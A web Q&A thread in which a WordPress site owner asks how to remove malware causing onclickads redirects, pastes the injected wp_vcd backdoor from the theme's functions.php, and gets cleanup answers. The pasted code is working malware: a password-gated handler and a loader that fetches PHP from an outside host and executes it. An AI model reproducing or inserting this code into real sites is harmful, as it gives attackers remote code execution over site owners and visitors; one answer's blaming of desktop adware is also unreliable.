WordPress site have been redirect my links to onclickads website

Question

I dont know if this is the code of the onlickads everytime when i click some links on my website it redirects me on onclickads.com links.

everytime i remove this code on my theme functions.php it will generate this code again and again.. when i check the original file of the theme functions this code is not included.

<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'f82a07ebbdf814988becaa9c78ce0ffb'))
{
    $div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
    {
        case 'change_domain';

        if (isset($_REQUEST['newdomain']))
        {

            if (!empty($_REQUEST['newdomain']))
            {
                if ($file = @file_get_contents(__FILE__))
                {
                    if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
                    {
                        $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                        @file_put_contents(__FILE__, $file);
                        print "true";
                    }
                }
            }
        }
        break;
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
    }
    die("");
}

if ( ! function_exists( 'w1p_te1mp_se1tup' ) ) {  
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( ! is_404() && stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        if($tmpcontent = @file_get_contents("http://www.dolsh.com/code8.php?i=".$path))
        {

            function w1p_te1mp_se1tup($phpCode) {
                $tmpfname = tempnam(sys_get_temp_dir(), "w1p_te1mp_se1tup");
                $handle = fopen($tmpfname, "w+");
                fwrite($handle, "<?php\n" . $phpCode);
                fclose($handle);
                include $tmpfname;
                unlink($tmpfname);
                return get_defined_vars();
            }
            extract(w1p_te1mp_se1tup($tmpcontent));
        }
    }
}

?>

any one can suggest what to do or tuts to remove the malware on my website,

Thank You.

Answer 1

This onclickads.com redirect is usually caused by adware installed on your computer. These adware programs are bundled with other free software that you download off of the Internet.

Might be you don't need to install a fresh version and you can remove this type of cautions from your site with below steps.

To remove the onclickads.com redirect, follow these steps:

1) Removed unwanted code from your file.

2) Uninstall malicious programs from Windows

3) Use security software on your system and also use security plugin in your WordPress like Anti-spam or Wordfence

After following this steps still, nothing works then you can install a fresh version and install security plugin with your fresh one to avoid hacking in future use.

Hope this will helpful for you. Thanks.

Answer 2

To completely delete the code, if you are using a child theme you have to also delete it from your parent theme at the same time

Answer 3

What I did to solve problem:

1. In wp-include directory, delete wp-vcd.php and class.wp.php files
2. In wp-include directory, open post.php and delete first php tag added by Malware
3. Open to theme's functions.php file, and delete the above codes

Answer 4

Here is a full detailed solution how to fix this Malware attack I found after looking for a solution for my attacked websites
https://github.com/rakshitshah94/wordpress-wp-vcd-malware-attack-solution